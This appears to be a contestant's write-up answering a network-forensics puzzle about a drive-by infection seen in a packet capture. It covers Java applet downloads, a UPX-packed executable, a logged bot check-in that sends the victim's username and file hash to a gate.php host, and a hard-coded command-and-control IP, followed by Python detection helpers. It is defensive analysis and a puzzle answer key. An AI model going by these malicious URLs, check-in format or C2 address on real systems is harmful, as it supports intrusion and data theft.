Name: Bashar Ewaida

Description: Puzzle #5: Ms. Moneymany's Mysterious Malware

The answers:

1. As part of the infection process, Ms. Moneymany's browser downloaded two Java applets. What were the names of the two .jar files that implemented these applets?

Tools: tshark, chaosreader.pl, text editor (to view true.php)

Details: tshark was quite helpful during the course of working on this puzzle.

    tshark -r infected.pcap -R http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri -e http.request.method | awk '{print $1," => ",$2, "\t ","http://"$3$4}'
    [..]
    192.168.23.129 => 59.53.91.102 http://nrtjo.eu/q.jar
    192.168.23.129 => 59.53.91.102 http://nrtjo.eu/sdfg.jar
    [..]

So the two jar files are "q.jar" and "sdfg.jar".

chaosreader.pl output:

    www: 192.168.23.129:1064 -> 59.53.91.102:80 File infected.pcap, Session 6
    GET /sdfg.jar HTTP/1.1
    www: 192.168.23.129:1065 -> 59.53.91.102:80 File infected.pcap, Session 7
    GET /q.jar HTTP/1.1

Viewing the true.php source, which writes the applet tags into the page with document.write(''), we can see the name "sdfg.'+'jar" (assembled from two string fragments) and "q.jar".

2. What was Ms. Moneymany's username on the infected Windows system?

Tools: tshark, Network Miner, chaosreader.pl

Details: Using tshark:

    tshark -r infected.pcap -R http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri -e http.request.method | awk '{print $1," => ",$2, "\t ","http://"$3$4}'
    192.168.23.129 => 212.252.32.20 http://freeways.in/11111/gate.php?guid=ADMINISTRATOR!TICKLABS-LZ!1C7AE7C1&ver=10084&stat=ONLINE&ie=8.0.6001.18702&os=5.1.2600&ut=Admin&cpu=92&ccrc=5A4F4DF7&md5=5942ba36cf732097479c51986eee91ed

It looks like the malicious code is sending information about the victim to its "gate", including a GUID (whose first component is the account name), status (stat), the Internet Explorer (IE) version (8.0.6001.18702), the OS version (5.1.2600), etc. From this info, we can say that Ms. Moneymany's username was "Administrator".

3. What was the starting URL of this incident? In other words, on which URL did Ms. Moneymany probably click?
Tools: tshark, Google, text editor, chaosreader.pl

Details:

    tshark -r infected.pcap -R http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," => ",$2, "\t ","http://"$3$4}'
    192.168.23.129 => 59.53.91.102 http://nrtjo.eu/true.php

tshark shows that the first URL requested by the user was "http://nrtjo.eu/true.php".

Using Google to search for nrtjo.eu showed that it was identified as malicious by various websites. malwareurl.com gave good detail about this domain: http://www.malwareurl.com/listing.php?domain=nrtjo.eu

    Malicious URLs on nrtjo.eu
    /index.php
    /true.php
    /xxx.xxx
    //pdf.php?spl=ie
    //loading.php?spl=pdf_email_

    Whois and network details
    Additional IP(s):
    Reverse: 59.53.91.102
    Name servers:
    ns2.vnmhab.com => 59.53.91.102 | 8 domains listed using this name server
    ns1.vnmhab.com => 59.53.91.102 | 8 domains listed using this name server
    www.eurid.eu => 195.234.53.204 | 257 domains listed using this name server

Based on the behavior described, and on the true.php source code, we see that this page does not show anything to the end user (Ms. Moneymany). It makes a request to http://nrtjo.eu//loading.php?spl=javad, which downloads an executable called file.exe, as we can see in the following chaosreader.pl output (note the Java User-Agent: this request comes from the applet, not from the browser itself; other tools like Wireshark, Network Miner, etc. show the same thing):

    www: 192.168.23.129:1066 -> 59.53.91.102:80 File infected.pcap, Session 11
    GET //loading.php?spl=javadnw&J050006010 HTTP/1.1
    User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_05
    Host: nrtjo.eu
    Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
    Connection: keep-alive

    HTTP/1.1 200 OK
    Server: nginx
    Date: Wed, 17 Mar 2010 00:56:05 GMT
    Content-Type: application/octet-stream
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/5.2.11
    Content-Disposition: inline; filename=file.exe

4. As part of the infection, a malicious Windows executable file was downloaded onto Ms. Moneymany's system. What was the file's MD5 hash?
Hint: It ends with "91ed".

Tools: tshark, Network Miner, md5sum

Details: The hint itself was very helpful. :) Using tshark we can see the info sent by the victim's machine, which includes the md5 hash of the downloaded file:

    tshark -r infected.pcap -R http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri -e http.request.method | awk '{print $1," => ",$2, "\t ","http://"$3$4}'
    192.168.23.129 => 212.252.32.20 http://freeways.in/11111/gate.php?guid=ADMINISTRATOR!TICKLABS-LZ!1C7AE7C1&ver=10084&stat=ONLINE&ie=8.0.6001.18702&os=5.1.2600&ut=Admin&cpu=92&ccrc=5A4F4DF7&md5=5942ba36cf732097479c51986eee91ed

We see that md5=5942ba36cf732097479c51986eee91ed, which ends with 91ed. :) Using Network Miner we get "file.exe.octet-stream"; running md5sum on that file gives the same md5 hash.

5. What is the name of the packer used to protect the malicious Windows executable?

Hint: This is one of the most popular freely-available packers seen in "mainstream" malware.

Tools: Network Miner, Microsoft Security Essentials, Immunity Debugger, hexdump

Details:

1-) Using Network Miner we can extract the executable. Doing so while Microsoft Security Essentials is running gives the following message:

    Description: This program is dangerous and executes commands from an attacker.
    Recommendation: Remove this software immediately.
    Microsoft Security Essentials detected programs that may compromise your privacy or damage your computer. You can still access the files that these programs use without removing them (not recommended). To access these files, select the 'Allow' action and click 'Apply actions'. If this option is not available, log on as administrator or ask the local administrator for help.
    Items:
    file: \AssembledFiles\59.53.91.102\HTTP - TCP 80\file.exe.octet-stream->(UPX)
    file: \AssembledFiles\59.53.91.102\HTTP - TCP 80\file.exe[1].octet-stream->(UPX)

As we can see in the "Items" section, (UPX) is the packer used to protect the malicious executable.
2-) Using hexdump on Linux we can see the UPX0 and UPX1 section names and the version string "3.04" (UPX 3.04) in the output:

    $ hexdump -C file.exe.octet-stream
    000001e0 55 50 58 30 00 00 00 00 00 80 00 00 00 10 00 00 |UPX0............|
    000001f0 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 |................|
    00000200 00 00 00 00 80 00 00 e0 55 50 58 31 00 00 00 00 |........UPX1....|
    00000210 00 10 01 00 00 90 00 00 00 02 01 00 00 04 00 00 |................|
    00000220 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 |............@...|
    00000230 2e 72 73 72 63 00 00 00 00 10 00 00 00 a0 01 00 |.rsrc...........|
    00000240 00 04 00 00 00 06 01 00 00 00 00 00 00 00 00 00 |................|
    00000250 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 |....@...........|
    00000260 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
    *
    000003d0 00 00 00 00 00 00 00 00 00 00 00 33 2e 30 34 00 |...........3.04.|

I used the new PeDetect under Immunity Debugger, which showed a different result:

    Message=[+] Signature Found : ['Crypto-Lock 2.02 (Eng) -> Ryan Thian']

However, from "1" and "2" it is safe to say that UPX was the packer used.

6. What is the MD5 hash of the unpacked version of the malicious Windows executable file?

Tools: UPX, md5sum, Network Miner

Details: Using Network Miner we get "file.exe.octet-stream". Using UPX we can get the unpacked version of the file (-d decompresses, -k keeps a backup of the packed original):

    ./upx -k -d file.exe.octet-stream

Then running md5sum gives us the md5 hash of the unpacked version, which is: 0f37839f48f7fc77e6d50e14657fb96e

7. The malicious executable attempts to connect to an Internet host using an IP address which is hard-coded into it (there was no DNS lookup). What is the IP address of that Internet host?

Tools: Wireshark, chaosreader.pl, Google

Details: We can see from the chaosreader.pl output that the victim machine made a connection to 213.155.29.144 on port 444 without any preceding DNS lookup.
This can be seen in Wireshark in frames 275 to 283.

Googling for that IP shows that it was flagged as malicious by some sites, including the following:

https://safeweb.norton.com/report/show?name=213.155.29.144

    213.155.29.144
    Summary
    Computer Threats: 1
    Identity Threats: 0
    Annoyance factors: 0
    Total threats on this site: 1

And http://www.threatexpert.com/report.aspx?md5=0f37839f48f7fc77e6d50e14657fb96e (the md5 of the unpacked file from question 6):

    [..]
    A keylogger program that can capture all user keystrokes (including confidential details such as username, password, credit card number, etc.)
    [..]
    There was a registered attempt to establish connection with the remote host. The connection details are:
    Remote Host      Port Number
    213.155.29.144   444
    [..]
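For questions 2 and 4, the answers are read off the gate.php check-in by hand above. As an added example (not part of this write-up), here is a small Python helper that scans tshark/awk-style request lines for such a check-in and pulls out the account name, version fields and MD5; the sample lines are constructed in the format the awk pipeline prints, with the gate.php line being the one from the capture.

```python
"""Find bot check-in ("gate") requests in tshark | awk output and parse the
victim data they carry: account name (first guid component), IE/OS versions
and the MD5 of the dropped binary."""
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample: "src => dst <tab> URL" lines as printed by the awk
# pipeline in the write-up. Only the gate.php line is from the capture.
SAMPLE_LINES = """\
192.168.23.129  =>  59.53.91.102 \t http://nrtjo.eu/true.php
192.168.23.129  =>  59.53.91.102 \t http://nrtjo.eu/q.jar
192.168.23.129  =>  212.252.32.20 \t http://freeways.in/11111/gate.php?guid=ADMINISTRATOR!TICKLABS-LZ!1C7AE7C1&ver=10084&stat=ONLINE&ie=8.0.6001.18702&os=5.1.2600&ut=Admin&cpu=92&ccrc=5A4F4DF7&md5=5942ba36cf732097479c51986eee91ed
"""

MD5_RE = re.compile(r"^[0-9a-f]{32}$")
LINE_RE = re.compile(r"^(\S+)\s+=>\s+(\S+)\s+(http://\S+)$")

def parse_request_line(line):
    """Split 'src => dst <tab> url' into (src, dst, url); None if malformed."""
    m = LINE_RE.match(line.strip())
    return m.groups() if m else None

def parse_checkin(url):
    """Return the check-in fields as a dict, or None when the URL does not
    look like a check-in (it must carry guid= and a 32-hex-digit md5=)."""
    parts = urlsplit(url)
    q = parse_qs(parts.query)
    if "guid" not in q or "md5" not in q:
        return None
    md5 = q["md5"][0].lower()
    if not MD5_RE.match(md5):
        return None
    guid_fields = q["guid"][0].split("!")   # account name is the first field
    return {
        "gate": parts.netloc + parts.path,
        "username": guid_fields[0],
        "guid_fields": guid_fields,
        "ie_version": q.get("ie", [""])[0],
        "os_version": q.get("os", [""])[0],
        "md5": md5,
    }

def find_checkins(text):
    """Scan tshark/awk output and return one dict per check-in found."""
    hits = []
    for line in text.splitlines():
        parsed = parse_request_line(line)
        if parsed is None:
            continue
        src, dst, url = parsed
        info = parse_checkin(url)
        if info:
            hits.append({"src": src, "dst": dst, **info})
    return hits
```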
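Question 7 hinges on spotting a connection with no DNS lookup before it. As an added example (not from this write-up), the Python below walks a constructed, simplified event timeline in capture order and flags every SYN to a public address that no earlier A record answered; in practice the events would be built from tshark fields such as dns.a and tcp.flags.syn, which is an assumption of this example rather than something the write-up did.

```python
"""Flag TCP connection attempts to public IPs that no earlier DNS answer
returned: a bot with a hard-coded C2 address skips the resolver entirely."""
import ipaddress

# Constructed events in capture order:
#   ("dns", queried_name, answer_ip)  an A record answer seen on the wire
#   ("syn", dst_ip, dst_port)         a client connection attempt
# Only the 213.155.29.144:444 attempt mirrors the puzzle; the rest is filler.
SAMPLE_EVENTS = [
    ("dns", "nrtjo.eu", "59.53.91.102"),
    ("syn", "59.53.91.102", 80),
    ("dns", "freeways.in", "212.252.32.20"),
    ("syn", "212.252.32.20", 80),
    ("syn", "213.155.29.144", 444),             # no A record precedes this
    ("syn", "213.155.29.144", 444),             # retransmit, reported once
    ("syn", "192.168.23.2", 53),                # local resolver, skipped
    ("dns", "late.example", "213.155.29.144"),  # too late to explain the SYN
]

def unresolved_connections(events):
    """Return [(dst_ip, dst_port), ...] for each SYN to a public address
    that no DNS answer earlier in the timeline resolved to. Private,
    loopback and link-local targets are ignored since no lookup is
    expected for them. Each (ip, port) pair is reported once."""
    resolved = {}   # answer ip -> names it was returned for, so far
    findings, seen = [], set()
    for ev in events:
        if ev[0] == "dns":
            _, name, ip = ev
            resolved.setdefault(ip, set()).add(name)
        elif ev[0] == "syn":
            _, ip, port = ev
            if not ipaddress.ip_address(ip).is_global:
                continue
            if ip not in resolved and (ip, port) not in seen:
                seen.add((ip, port))
                findings.append((ip, port))
    return findings

def resolved_names_for(events, ip):
    """Names that ever resolved to ip (empty for a hard-coded address)."""
    return sorted({name for kind, name, a in events if kind == "dns" and a == ip})
```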